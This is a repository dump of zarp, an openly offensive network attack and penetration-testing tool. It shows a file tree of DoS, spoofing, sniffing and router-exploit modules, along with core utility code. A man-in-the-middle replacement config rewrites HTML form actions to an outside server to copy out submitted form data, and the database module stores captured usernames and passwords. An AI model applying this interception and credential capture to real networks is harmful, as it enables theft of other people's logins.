├── .gitignore
├── CONTRIBUTORS
├── LICENSE
├── README.md
├── clean.sh
├── config
    ├── replacements
    └── zarp.conf
├── requirements.txt
├── src
    ├── __init__.py
    ├── core
    │   ├── __init__.py
    │   ├── colors.py
    │   ├── config.py
    │   ├── database.py
    │   ├── module.py
    │   ├── parse_cmd.py
    │   ├── session_manager.py
    │   ├── stream.py
    │   ├── util.py
    │   ├── zcrypto.py
    │   └── zoption.py
    ├── lib
    │   ├── libmproxy
    │   │   ├── __init__.py
    │   │   ├── app.py
    │   │   ├── cmdline.py
    │   │   ├── console
    │   │   │   ├── __init__.py
    │   │   │   ├── common.py
    │   │   │   ├── contentview.py
    │   │   │   ├── flowdetailview.py
    │   │   │   ├── flowlist.py
    │   │   │   ├── flowview.py
    │   │   │   ├── grideditor.py
    │   │   │   ├── help.py
    │   │   │   └── palettes.py
    │   │   ├── contrib
    │   │   │   ├── README
    │   │   │   ├── __init__.py
    │   │   │   ├── html2text.py
    │   │   │   ├── jsbeautifier
    │   │   │   │   ├── __init__.py
    │   │   │   │   └── unpackers
    │   │   │   │   │   ├── README.specs.mkd
    │   │   │   │   │   ├── __init__.py
    │   │   │   │   │   ├── evalbased.py
    │   │   │   │   │   ├── javascriptobfuscator.py
    │   │   │   │   │   ├── myobfuscate.py
    │   │   │   │   │   ├── packer.py
    │   │   │   │   │   └── urlencode.py
    │   │   │   └── pyparsing.py
    │   │   ├── controller.py
    │   │   ├── dump.py
    │   │   ├── encoding.py
    │   │   ├── filt.py
    │   │   ├── flow.py
    │   │   ├── platform
    │   │   │   ├── __init__.py
    │   │   │   ├── linux.py
    │   │   │   ├── osx.py
    │   │   │   └── pf.py
    │   │   ├── proxy.py
    │   │   ├── script.py
    │   │   ├── tnetstring.py
    │   │   ├── utils.py
    │   │   └── version.py
    │   └── scapy
    │   │   ├── __init__.py
    │   │   ├── all.py
    │   │   ├── ansmachine.py
    │   │   ├── arch
    │   │       ├── __init__.py
    │   │       ├── bsd.py
    │   │       ├── linux.py
    │   │       ├── pcapdnet.py
    │   │       ├── solaris.py
    │   │       ├── unix.py
    │   │       └── windows
    │   │       │   └── __init__.py
    │   │   ├── as_resolvers.py
    │   │   ├── asn1
    │   │       ├── __init__.py
    │   │       ├── asn1.py
    │   │       ├── ber.py
    │   │       └── mib.py
    │   │   ├── asn1fields.py
    │   │   ├── asn1packet.py
    │   │   ├── automaton.py
    │   │   ├── autorun.py
    │   │   ├── base_classes.py
    │   │   ├── config.py
    │   │   ├── crypto
    │   │       ├── __init__.py
    │   │       └── cert.py
    │   │   ├── dadict.py
    │   │   ├── data.py
    │   │   ├── error.py
    │   │   ├── fields.py
    │   │   ├── layers
    │   │       ├── __init__.py
    │   │       ├── all.py
    │   │       ├── bluetooth.py
    │   │       ├── dhcp.py
    │   │       ├── dhcp6.py
    │   │       ├── dns.py
    │   │       ├── dot11.py
    │   │       ├── gprs.py
    │   │       ├── hsrp.py
    │   │       ├── inet.py
    │   │       ├── inet6.py
    │   │       ├── ir.py
    │   │       ├── isakmp.py
    │   │       ├── l2.py
    │   │       ├── l2tp.py
    │   │       ├── llmnr.py
    │   │       ├── mgcp.py
    │   │       ├── mobileip.py
    │   │       ├── netbios.py
    │   │       ├── netflow.py
    │   │       ├── ntp.py
    │   │       ├── pflog.py
    │   │       ├── ppp.py
    │   │       ├── radius.py
    │   │       ├── rip.py
    │   │       ├── rtp.py
    │   │       ├── sctp.py
    │   │       ├── sebek.py
    │   │       ├── skinny.py
    │   │       ├── smb.py
    │   │       ├── snmp.py
    │   │       ├── tftp.py
    │   │       └── x509.py
    │   │   ├── main.py
    │   │   ├── modules
    │   │       ├── __init__.py
    │   │       ├── geoip.py
    │   │       ├── nmap.py
    │   │       ├── p0f.py
    │   │       ├── queso.py
    │   │       └── voip.py
    │   │   ├── packet.py
    │   │   ├── plist.py
    │   │   ├── pton_ntop.py
    │   │   ├── route.py
    │   │   ├── route6.py
    │   │   ├── sendrecv.py
    │   │   ├── sendrecv_backup.py
    │   │   ├── supersocket.py
    │   │   ├── themes.py
    │   │   ├── tools
    │   │       ├── UTscapy.py
    │   │       ├── __init__.py
    │   │       └── check_asdis.py
    │   │   ├── utils.py
    │   │   ├── utils6.py
    │   │   └── volatile.py
    └── modules
    │   ├── __init__.py
    │   ├── attacks
    │       ├── __init__.py
    │       ├── attack.py
    │       ├── beef_hook.py
    │       ├── pemod.py
    │       ├── redirect_port.py
    │       └── replacer.py
    │   ├── dos
    │       ├── __init__.py
    │       ├── dhcp_starvation.py
    │       ├── dos.py
    │       ├── igmp_nix.py
    │       ├── land_dos.py
    │       ├── ndp_dos.py
    │       ├── nestea_dos.py
    │       ├── nud.py
    │       ├── smb2_dos.py
    │       └── tcp_syn.py
    │   ├── parameter
    │       ├── __init__.py
    │       ├── ap_crack.py
    │       ├── parameter.py
    │       ├── router_pwn.py
    │       ├── routers
    │       │   ├── __init__.py
    │       │   ├── asus
    │       │   │   ├── __init__.py
    │       │   │   └── rt56u_change_admin.py
    │       │   ├── cisco
    │       │   │   ├── __init__.py
    │       │   │   ├── ios_full_admin.py
    │       │   │   └── kits_dtraverse.py
    │       │   ├── default_passwords.py
    │       │   ├── dlink
    │       │   │   ├── __init__.py
    │       │   │   ├── add_admin_300.py
    │       │   │   ├── add_admin_605.py
    │       │   │   ├── backdoor_250n.py
    │       │   │   ├── change_admin_1310.py
    │       │   │   ├── change_admin_2640.py
    │       │   │   └── get_config_320b.py
    │       │   ├── linksys
    │       │   │   ├── __init__.py
    │       │   │   ├── wag54gs_change_admin.py
    │       │   │   ├── wap610n_dump.py
    │       │   │   └── wrt54g_reset_admin.py
    │       │   ├── netgear
    │       │   │   ├── __init__.py
    │       │   │   ├── wnr2000_get_pass.py
    │       │   │   └── wpn824v3_get_config.py
    │       │   ├── rosewill
    │       │   │   ├── __init__.py
    │       │   │   └── rsva_backdoor.py
    │       │   ├── router_vuln.py
    │       │   └── zoom
    │       │   │   ├── __init__.py
    │       │   │   └── x4_5_mod_password.py
    │       ├── slarpc.py
    │       ├── slarpd.py
    │       ├── switchover.py
    │       └── wifite.py
    │   ├── poison
    │       ├── __init__.py
    │       ├── arp.py
    │       ├── dhcp.py
    │       ├── dns.py
    │       ├── icmp.py
    │       ├── llmnr.py
    │       ├── nbns.py
    │       └── poison.py
    │   ├── scanner
    │       ├── __init__.py
    │       ├── ap_scan.py
    │       ├── net_map.py
    │       ├── passive_scan.py
    │       ├── scanner.py
    │       └── service_scan.py
    │   ├── services
    │       ├── __init__.py
    │       ├── access_point.py
    │       ├── ftp.py
    │       ├── http.py
    │       ├── service.py
    │       ├── smb.py
    │       ├── ssh.py
    │       ├── stubssh.py
    │       └── telnet.py
    │   └── sniffer
    │       ├── __init__.py
    │       ├── database_sniffer.py
    │       ├── http_sniffer.py
    │       ├── parser_mysql.py
    │       ├── parser_postgres.py
    │       ├── password_parser.py
    │       ├── password_sniffer.py
    │       ├── sniffer.py
    │       └── traffic_sniffer.py
└── zarp.py


/.gitignore:
--------------------------------------------------------------------------------
1 | # Ignore compiled python files
2 | *.py[cod]
3 | 


--------------------------------------------------------------------------------
/CONTRIBUTORS:
--------------------------------------------------------------------------------
1 | Thanks to the following users for their contributions to zarp
2 | ==============================================================
3 | NullMode
4 | z4ck
5 | bwall
6 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 |     ZARP NETWORK ATTACK TOOL
 2 | 	Copyright (C) 2012 - 2014 drone <drone AT ballastsecurity DOT com>
 3 | 
 4 |     This program is free software: you can redistribute it and/or modify
 5 |     it under the terms of the GNU General Public License as published by
 6 |     the Free Software Foundation, either version 3 of the License, or
 7 |     (at your option) any later version.
 8 | 
 9 |     This program is distributed in the hope that it will be useful,
10 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |     GNU General Public License for more details.
13 | 
14 |     You should have received a copy of the GNU General Public License
15 |     along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | 


--------------------------------------------------------------------------------
/clean.sh:
--------------------------------------------------------------------------------
1 | # clean my directories; prevent accidental rm -f *.py 
2 | find ./ -iname *.pyc -exec rm -f '{}' ';'
3 | rm -f ./zarp_debug.log
4 | 


--------------------------------------------------------------------------------
/config/replacements:
--------------------------------------------------------------------------------
 1 | #
 2 | # zarp's match and replace config file for the Replacer
 3 | # module.  Entries should be listed in the following form:
 4 | #
 5 | #           match = match replace
 6 | #
 7 | # This module supports two different match forms; regex and HTML tags.  In
 8 | # the first case, anything that re.sub accepts, this will accept.  In the
 9 | # latter case, tags can be specified in the following:
10 | #
11 | #           2 img src = http://google.com
12 | #
13 | # This will parse each img tag and replace the src with http://google.com. To
14 | # distinguish between the two types, 1 should be prefixed to regex entries, and
15 | # 2 should be prefixed to HTML tags.
16 | # 
17 | # Several test entries have been listed here.  The regex isnt perfect because regex
18 | # with HTML is a monster.
19 | #
20 | 
21 | # match img tags and replace the src with rick astley
22 | #1 (?<=<img src=['"]).*(?=['"] ) = http://whitsblog.com/wp-content/uploads/2012/05/Rick-astley-never-gonna-give-you-up.jpg
23 | 
24 | # match exe, zip, and msi files and replace with a download link to Putty
25 | #1 (?<=href=['"]).*[.exe|.zip](?=['"] ) = http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
26 | 
27 | # match img src tags and replace with rick astley
28 | 2 img src = http://whitsblog.com/wp-content/uploads/2012/05/Rick-astley-never-gonna-give-you-up.jpg
29 | 
30 | # modify form actions to submit to another server, which can be used to copy out 
31 | # form parameters and forward them on
32 | 2 form action = http://192.168.1.6/
33 | 


--------------------------------------------------------------------------------
/config/zarp.conf:
--------------------------------------------------------------------------------
 1 | #
 2 | # zarp configuration file
 3 | #
 4 | debug=False
 5 | log=zarp_debug.log
 6 | 
 7 | # database configuration; ignored with sqlite3
 8 | db_ip=localhost
 9 | db_port=5432
10 | db_usr=zarp
11 | db_pw=default
12 | 
13 | #
14 | # options: sqlite, mysql, pgsql 
15 | # sqlite3 database stored at config/zarp.db
16 | #
17 | db_con=sqlite3
18 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | Flask==1.0
2 | netlib==0.11.1
3 | paramiko==2.10.1
4 | 


--------------------------------------------------------------------------------
/src/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | 


--------------------------------------------------------------------------------
/src/core/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | 


--------------------------------------------------------------------------------
/src/core/colors.py:
--------------------------------------------------------------------------------
 1 | class color:
 2 |     """ Define plain colors
 3 |     """
 4 |     GRAY     = '\033[30m'
 5 |     RED      = '\033[31m'
 6 |     GREEN    = '\033[32m'
 7 |     YELLOW   = '\033[33m'
 8 |     BLUE     = '\033[34m'
 9 |     MAGENTA  = '\033[35m'
10 |     CYAN     = '\033[36m'
11 |     WHITE    = '\033[37m'
12 |     CRIMSON  = '\033[38m'
13 | 
14 |     """ Define highlighted colors
15 |     """
16 |     RED_HL     = '\033[41m'
17 |     GREEN_HL   = '\033[42m'
18 |     BROWN_HL   = '\033[43m'
19 |     BLUE_HL    = '\033[44m'
20 |     MAGENTA_HL = '\033[45m'
21 |     CYAN_HL    = '\033[46m'
22 |     GRAY_HL    = '\033[47m'
23 |     WHITE_HL   = '\033[48m'
24 | 
25 |     """ Define bold colors
26 |     """
27 |     B_GRAY     = '\033[1;30m'
28 |     B_RED      = '\033[1;31m'
29 |     B_GREEN    = '\033[1;32m'
30 |     B_YELLOW   = '\033[1;33m'
31 |     B_BLUE     = '\033[1;34m'
32 |     B_MAGENTA  = '\033[1;35m'
33 |     B_CYAN     = '\033[1;36m'
34 |     B_WHITE    = '\033[1;37m'
35 |     B_CRIMSON  = '\033[1;38m'
36 | 
37 |     """ Define bold highlighted colors
38 |     """
39 |     B_RED_HL     = '\033[1;41m'
40 |     B_GREEN_HL   = '\033[1;42m'
41 |     B_BROWN_HL   = '\033[1;43m'
42 |     B_BLUE_HL    = '\033[1;44m'
43 |     B_MAGENTA_HL = '\033[1;45m'
44 |     B_CYAN_HL    = '\033[1;46m'
45 |     B_GRAY_HL    = '\033[1;47m'
46 |     B_WHITE_HL   = '\033[1;48m'
47 | 
48 |     """ Define end variable to cancel colors
49 |     """
50 |     END = '\033[0m'
51 | 


--------------------------------------------------------------------------------
/src/core/database.py:
--------------------------------------------------------------------------------
  1 | import util
  2 | import sqlite3
  3 | import config
  4 | 
  5 | """ Manages all interactions between zarp and the connected database
  6 | """
  7 | 
  8 | 
  9 | class Database(object):
 10 |     def __init__(self):
 11 |         self.connection = None
 12 | 
 13 |         db_type = config.get('db_con')
 14 |         if db_type == 'sqlite3':
 15 |             self.connection = sqlite3.connect('config/zarp.db',
 16 |                                                 check_same_thread=False)
 17 |         elif db_type == 'pgsql':
 18 |             util.Error('Postgres is not yet supported.')
 19 |         elif db_type == 'mysql':
 20 |             util.Error('mysql is not yet supported')
 21 | 
 22 |     def initialize_schema(self):
 23 |         """ If this is a new db, build it
 24 |         """
 25 |         tmp = insert('create table log(module, time, message)')
 26 |         if not tmp:
 27 |             return
 28 | 
 29 |         # it didnt fail, create default schema
 30 |         insert('create table host (mac UNIQUE, ip, hostname);')
 31 |         insert('create table credentials (username, password, location, '
 32 |                'source_idx, time, FOREIGN KEY(source_idx) REFERENCES host(ROWID));')
 33 | 
 34 | db = None
 35 | 
 36 | 
 37 | def initialize():
 38 |     global db
 39 |     db = Database()
 40 |     db.initialize_schema()
 41 | 
 42 | 
 43 | def fetch(query, parameters=None):
 44 |     """ Generic fetch query.  Returns a list of all results.
 45 | 
 46 |         Parameters should be a tuple, or list of tuples.
 47 |         ie: SELECT ? FROM log;
 48 |             parameters = ('module',)
 49 |     """
 50 |     global db
 51 |     try:
 52 |         cursor = db.connection.cursor()
 53 | 
 54 |         if parameters is None:
 55 |             cursor.execute(query)
 56 |         else:
 57 |             cursor.execute(query, parameters)
 58 |         return cursor.fetchall()
 59 |     except Exception, e:
 60 |         print e
 61 |         return None
 62 | 
 63 | 
 64 | def insert(query, parameters=None):
 65 |     """ Generic insert/create/update query against the loaded database.
 66 |     """
 67 |     global db
 68 |     success = False
 69 |     try:
 70 |         cursor = db.connection.cursor()
 71 | 
 72 |         if parameters is None:
 73 |             cursor.execute(query)
 74 |         else:
 75 |             cursor.execute(query, parameters)
 76 | 
 77 |         db.connection.commit()
 78 |         success = True
 79 |     except:
 80 |         success = False    # unique violation/doesnt exist/etc.
 81 |     return success
 82 | 
 83 | 
 84 | def shutdown():
 85 |     """ Commit any cached queries and close down the connection
 86 |     """
 87 |     global db
 88 |     if db is not None:
 89 |         db.connection.commit()
 90 |         db.connection.close()
 91 | 
 92 | 
 93 | def _timestamp():
 94 |     """ return a formatted timestamp
 95 |     """
 96 |     return util.timestamp()
 97 | 
 98 | 
 99 | def dblog(msg, module):
100 |     """ Insert a log event.  Removes a newline.
101 |     """
102 |     return insert('INSERT INTO log VALUES (?,?,?)', (module, _timestamp(),
103 |                                                             msg.rstrip()))
104 | 
105 | 
106 | def dbcredentials(username, password, location, source):
107 |     """ Insert credentials into the database.  If the host is not found,
108 |         insert the source into the host table with a null mac/hostname,
109 |         which can be updated later.
110 | 
111 |         Source should be an IP address of the source the credentials were
112 |         coming from.
113 |         Location is where the credentials were being used at.
114 |     """
115 |     source_idx = None
116 |     while source_idx is None: 
117 |         source_idx = fetch('SELECT ROWID FROM host WHERE ip = ?', (source,))
118 |         if len(source_idx) > 0:
119 |            source_idx = source_idx[0][0]
120 |         else:
121 |             dbhost(None, source, None)
122 |             source_idx = None
123 | 
124 |     return insert('INSERT INTO credentials VALUES (?,?,?,?,?)',
125 |                     (username, password, location, source_idx, _timestamp()))
126 | 
127 | def dbhost(mac, ip, hostname):
128 |     """ insert basic host information into the database
129 |     """
130 |     source_idx = None
131 |     while source_idx is None:
132 |         source_idx = fetch('SELECT ROWID FROM host WHERE ip = ?', (ip,))
133 |         if len(source_idx) > 0:
134 |             # the host is already in the database; update the mac/hostname
135 |             insert('UPDATE host SET mac = ?, hostname = ? WHERE ip = ?',
136 |                         (mac, hostname))
137 |             source_idx = None
138 |         else:
139 |             source_idx = insert('INSERT INTO host VALUES (?,?,?);', (mac, ip, hostname))
140 |     return source_idx
141 | 


--------------------------------------------------------------------------------
/src/core/parse_cmd.py:
--------------------------------------------------------------------------------
 1 | from stream import handle_opts
 2 | import sys
 3 | import argparse
 4 | import util
 5 | 
 6 | from scapy.all import *
 7 | from scapy.error import Scapy_Exception
 8 | 
 9 | 
10 | def parse(sysv, loader):
11 |     """ Modules can set their own CLI options.  Right now we only
12 |         load services and scanners, as these represent a majority of
13 |         the 'typical' use case for something you want to pull off quickly.
14 | 
15 |         loader is a Loader object with all loaded modules.
16 |     """
17 |     parser = argparse.ArgumentParser(description=util.header())
18 | 
19 |     # add standard options
20 |     parser.add_argument('-q', help='Generic network sniff', action='store',
21 |                                                             dest='filter')
22 |     parser.add_argument('--update', help='Update Zarp', action='store_true',
23 |                                 default=False, dest='update')
24 | 
25 |     service_group = parser.add_argument_group('Services')
26 |     scanner_group = parser.add_argument_group('Scanners')
27 | 
28 |     # iterate through loaded modules and build the argument parser
29 |     for service in loader.services:
30 |         if hasattr(service, 'cli'):
31 |             service().cli(service_group)
32 | 
33 |     for scanner in loader.scanner:
34 |         if hasattr(scanner, 'cli'):
35 |             scanner().cli(scanner_group)
36 | 
37 |     options = parser.parse_args()
38 |     option_dict = options.__dict__
39 | 
40 |     # first handle standard options
41 |     if options.filter:
42 |         util.Msg("Sniffing with filter [%s]...(ctrl^c to exit)" %
43 |                                                                 options.filter)
44 |         try:
45 |             sniff(filter=options.filter, store=0, prn=lambda x: x.summary())
46 |         except Exception:
47 |             util.Msg("Exiting sniffer..")
48 |         except Scapy_Exception as msg:
49 |             util.Error(msg)
50 |         sys.exit(1)
51 |     elif options.update:
52 |         update()
53 |         sys.exit(1)
54 | 
55 |     # we can only launch one module at a time, so grab the first
56 |     usr_mod = [x for x in option_dict.keys() if option_dict[x] is True][0]
57 | 
58 |     # see what it is
59 |     if usr_mod in [x().which for x in loader.services]:
60 |         module = [x for x in loader.services if x().which == usr_mod][0]()
61 |         util.Msg('Starting %s...' % module.which)
62 |         module.dump_data = True
63 |         module.initialize()
64 |     elif usr_mod in [x().which for x in loader.scanner]:
65 |         module = [x for x in loader.scanner if x().which == usr_mod][0]()
66 |         if module and handle_opts(module):
67 |             module.initialize()
68 |     sys.exit(1)
69 | 
70 | 
71 | def update():
72 |     """Run update routine
73 |     """
74 |     if not util.does_file_exist('./.git/config'):
75 |         util.Error('Not a git repo; please checkout from Github with \n\t'
76 |                 'git clone http://github.com/hatRiot/zarp.git\n to update.')
77 |     else:
78 |         util.Msg('Updating Zarp...')
79 |         ret = util.init_app('git branch -a | grep \'* dev\'', True)
80 |         if len(ret) > 3:
81 |             util.Error('You appear to be on the dev branch.'
82 |                         'Please switch off dev to update.')
83 |             return
84 | 
85 |         ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD')
86 |         if 'Already up-to-date' in ret:
87 |             util.Msg('Zarp already up to date.')
88 |         elif 'fatal' in ret:
89 |             util.Error('Error updating Zarp: %s' % ret)
90 |         else:
91 |             from util import version
92 |             util.Msg('Zarp updated to version %s' % (version()))
93 | 


--------------------------------------------------------------------------------
/src/core/session_manager.py:
--------------------------------------------------------------------------------
 1 | import stream
 2 | import util
 3 | from colors import color
 4 | from os import system
 5 | from os import path
 6 | 
 7 | #
 8 | # Module provides the front end for interacting with sessions
 9 | #
10 | 
11 | session_menu = ['Stop session', 'View session', 'Start session logger',
12 |                   'Stop session logger']
13 | 
14 | 
15 | def menu():
16 |     """Driver for the session management menu
17 |     """
18 |     while True:
19 |         stream.dump_sessions()
20 |         choice = util.print_menu(session_menu)
21 | 
22 |         if choice == 0:
23 |             break
24 |         elif choice == 1:
25 |             (module, number) = stream.get_session_input()
26 |             if not module is None:
27 |                 stream.stop_session(module, number)
28 |         elif choice == 2:
29 |             (module, number) = stream.get_session_input()
30 |             if not module is None:
31 |                 stream.view_session(module, number)
32 |         elif choice == 3:
33 |             try:
34 |                 display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \
35 |                           '] Enter file to log to' + color.B_WHITE + ' > ' + color.END
36 |                 file_path = raw_input(display)
37 |                 if file_path is None:
38 |                     return
39 |                 if util.does_file_exist(file_path) or path.islink(file_path):
40 |                     util.Error('File already exists.')
41 |                     return
42 |                 (module, number) = stream.get_session_input()
43 |                 if not module is None:
44 |                     display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \
45 |                               '] Log output from %s session %s to %s. Is this correct? '  + \
46 |                               color.B_GREEN + '[' + color.B_YELLOW + 'Y' + color.B_GREEN + \
47 |                               '/' + color.B_YELLOW + 'n' + color.B_GREEN + '] ' + \
48 |                               color.B_WHITE + '> ' + color.END
49 |                     tmp = raw_input(display % (module, number, file_path))
50 |                     if 'n' in tmp.lower():
51 |                         return
52 |                     stream.toggle_log(module, number, file_path, True)
53 |             except KeyboardInterrupt:
54 |                 return
55 |             except Exception:
56 |                 util.Error('Error logging to given file')
57 |                 return
58 |         elif choice == 4:
59 |             (module, number) = stream.get_session_input()
60 |             if not module is None:
61 |                 stream.toggle_log(module, number)
62 |         elif choice == -1:
63 |             pass
64 |         else:
65 |             system('clear')
66 | 


--------------------------------------------------------------------------------
/src/core/zoption.py:
--------------------------------------------------------------------------------
 1 | from util import eval_type
 2 | 
 3 | 
 4 | class Zoption:
 5 |     """ generic option class for managing and validating
 6 |         zarp options.
 7 |     """
 8 | 
 9 |     def __init__(self, value=None, type=None, required=False, display=None, opts=None):
10 |         self.value = value
11 |         if isinstance(type, basestring):
12 |             self.types = [type]
13 |             self.type = type
14 |         else:
15 |             self.types = type
16 |             self.type = None
17 |         self.required = required
18 |         self.display = display
19 |         self.opts = opts
20 | 
21 |     def getStr(self):
22 |         """ Some objects don't have a __str__ method (regex),
23 |             so we'll need to return the string representation
24 |             of the object.
25 |         """
26 |         if self.value is None:
27 |             return None
28 |         elif self.type == "regex":
29 |             return self.value.pattern
30 |         elif self.type == 'list':
31 |             return '[list]'
32 |         else:
33 |             return str(self.value)
34 | 
35 |     def validate(self):
36 |         """ Validates the object's value to ensure it conforms
37 |             to whatever type the object dictates.
38 |         """
39 |         for t in self.types:
40 |             rvals = eval_type(self.value, t)
41 |             if rvals[0]:
42 |                 self.value = rvals[1]
43 |                 self.type = t
44 |                 return True
45 |         return False


--------------------------------------------------------------------------------
/src/lib/libmproxy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatRiot/zarp/5f19d83b45e3b6766844d5ffe7ef38122dc3fef6/src/lib/libmproxy/__init__.py


--------------------------------------------------------------------------------
/src/lib/libmproxy/app.py:
--------------------------------------------------------------------------------
1 | import flask
2 | 
3 | mapp = flask.Flask(__name__)
4 | 
5 | @mapp.route("/")
6 | def hello():
7 |     return "mitmproxy"
8 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/console/flowdetailview.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2012  Aldo Cortesi
  2 | #
  3 | # This program is free software: you can redistribute it and/or modify
  4 | # it under the terms of the GNU General Public License as published by
  5 | # the Free Software Foundation, either version 3 of the License, or
  6 | # (at your option) any later version.
  7 | #
  8 | # This program is distributed in the hope that it will be useful,
  9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 11 | # GNU General Public License for more details.
 12 | #
 13 | # You should have received a copy of the GNU General Public License
 14 | # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 15 | 
 16 | import urwid
 17 | import common
 18 | 
 19 | footer = [
 20 |     ('heading_key', "q"), ":back ",
 21 | ]
 22 | 
 23 | class FlowDetailsView(urwid.ListBox):
 24 |     def __init__(self, master, flow, state):
 25 |         self.master, self.flow, self.state = master, flow, state
 26 |         urwid.ListBox.__init__(
 27 |             self,
 28 |             self.flowtext()
 29 |         )
 30 | 
 31 |     def keypress(self, size, key):
 32 |         key = common.shortcuts(key)
 33 |         if key == "q":
 34 |             self.master.statusbar = self.state[0]
 35 |             self.master.body = self.state[1]
 36 |             self.master.header = self.state[2]
 37 |             self.master.make_view()
 38 |             return None
 39 |         elif key == "?":
 40 |             key = None
 41 |         return urwid.ListBox.keypress(self, size, key)
 42 | 
 43 |     def flowtext(self):
 44 |         text = []
 45 | 
 46 |         title = urwid.Text("Flow details")
 47 |         title = urwid.Padding(title, align="left", width=("relative", 100))
 48 |         title = urwid.AttrWrap(title, "heading")
 49 |         text.append(title)
 50 | 
 51 |         if self.flow.response:
 52 |             c = self.flow.response.cert
 53 |             if c:
 54 |                 text.append(urwid.Text([("head", "Server Certificate:")]))
 55 |                 parts = [
 56 |                     ["Type", "%s, %s bits"%c.keyinfo],
 57 |                     ["SHA1 digest", c.digest("sha1")],
 58 |                     ["Valid to", str(c.notafter)],
 59 |                     ["Valid from", str(c.notbefore)],
 60 |                     ["Serial", str(c.serial)],
 61 |                 ]
 62 | 
 63 |                 parts.append(
 64 |                     [
 65 |                         "Subject",
 66 |                         urwid.BoxAdapter(
 67 |                             urwid.ListBox(common.format_keyvals(c.subject, key="highlight", val="text")),
 68 |                             len(c.subject)
 69 |                         )
 70 |                     ]
 71 |                 )
 72 | 
 73 |                 parts.append(
 74 |                     [
 75 |                         "Issuer",
 76 |                         urwid.BoxAdapter(
 77 |                             urwid.ListBox(common.format_keyvals(c.issuer, key="highlight", val="text")),
 78 |                             len(c.issuer)
 79 |                         )
 80 |                     ]
 81 |                 )
 82 | 
 83 |                 if c.altnames:
 84 |                     parts.append(
 85 |                         [
 86 |                             "Alt names",
 87 |                             ", ".join(c.altnames)
 88 |                         ]
 89 |                     )
 90 |                 text.extend(common.format_keyvals(parts, key="key", val="text", indent=4))
 91 | 
 92 |         if self.flow.request.client_conn:
 93 |             text.append(urwid.Text([("head", "Client Connection:")]))
 94 |             cc = self.flow.request.client_conn
 95 |             parts = [
 96 |                 ["Address", "%s:%s"%tuple(cc.address)],
 97 |                 ["Requests", "%s"%cc.requestcount],
 98 |                 ["Closed", "%s"%cc.close],
 99 |             ]
100 |             text.extend(common.format_keyvals(parts, key="key", val="text", indent=4))
101 | 
102 |         return text
103 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/README:
--------------------------------------------------------------------------------
 1 | 
 2 | Contribs:
 3 | 
 4 | 
 5 | pyparsing 1.5.2, MIT license
 6 | 
 7 | jsbeautifier, git checkout 25/03/12, MIT license
 8 |     - Removed test directories
 9 |     - Disabled packers through a single-line modification (see "# CORTESI"
10 |     comment)
11 | 
12 | html2text, git checkout 18/08/12, GPLv3
13 | 
14 | md5crypt, PSF license, http://code.activestate.com/recipes/325204/
15 | 
16 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatRiot/zarp/5f19d83b45e3b6766844d5ffe7ef38122dc3fef6/src/lib/libmproxy/contrib/__init__.py


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/README.specs.mkd:
--------------------------------------------------------------------------------
 1 | # UNPACKERS SPECIFICATIONS
 2 | 
 3 | Nothing very difficult: an unpacker is a submodule placed in the directory
 4 | where this file was found. Each unpacker must define three symbols:
 5 | 
 6 |  * `PRIORITY`       : integer number expressing the priority in applying this
 7 |                       unpacker. Lower number means higher priority.
 8 |                       Makes sense only if a source file has been packed with
 9 |                       more than one packer.
10 |  * `detect(source)` : returns `True` if source is packed, otherwise, `False`.
11 |  * `unpack(source)` : takes a `source` string and unpacks it. Must always return
12 |                       valid JavaScript. That is to say, your code should look
13 |                       like:
14 | 
15 | ```
16 | if detect(source):
17 |     return do_your_fancy_things_with(source)
18 | else:
19 |     return source
20 | ```
21 | 
22 | *You can safely define any other symbol in your module, as it will be ignored.*
23 | 
24 | `__init__` code will automatically load new unpackers, without any further step
25 | to be accomplished. Simply drop it in this directory.
26 | 


--------------------------------------------------------------------------------
/src/lib/libmproxy/contrib/jsbeautifier/unpackers/__init__.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # General code for JSBeautifier unpackers infrastructure. See README.specs
 3 | #     written by Stefano Sanfilippo <a.little.coder@gmail.com>
 4 | #
 5 | 
 6 | """General code for JSBeautifier unpackers infrastructure."""
 7 | 
 8 | import pkgutil
 9 | import re
10 | from jsbeautifier.unpackers import evalbased
11 | 
12 | # NOTE: AT THE MOMENT, IT IS DEACTIVATED FOR YOUR SECURITY: it runs js!
13 | BLACKLIST = ['jsbeautifier.unpackers.evalbased']
14 | 
15 | class UnpackingError(Exception):
16 |     """Badly packed source or general error. Argument is a
17 |     meaningful description."""
18 |     pass
19 | 
20 | def getunpackers():
21 |     """Scans the unpackers dir, finds unpackers and add them to UNPACKERS list.
22 |     An unpacker will be loaded only if it is a valid python module (name must
23 |     adhere to naming conventions) and it is not blacklisted (i.e. inserted
24 |     into BLACKLIST."""
25 |     path = __path__
26 |     prefix = __name__ + '.'
27 |     unpackers = []
28 |     interface = ['unpack', 'detect', 'PRIORITY']
29 |     for _importer, modname, _ispkg in pkgutil.iter_modules(path, prefix):
30 |         if 'tests' not in modname and modname not in BLACKLIST:
31 |             try:
32 |                 module = __import__(modname, fromlist=interface)
33 |             except ImportError:
34 |                 raise UnpackingError('Bad unpacker: %s' % modname)
35 |             else:
36 |                 unpackers.append(module)
37 | 
38 |     return sorted(unpackers, key = lambda mod: mod.PRIORITY)
39 | 
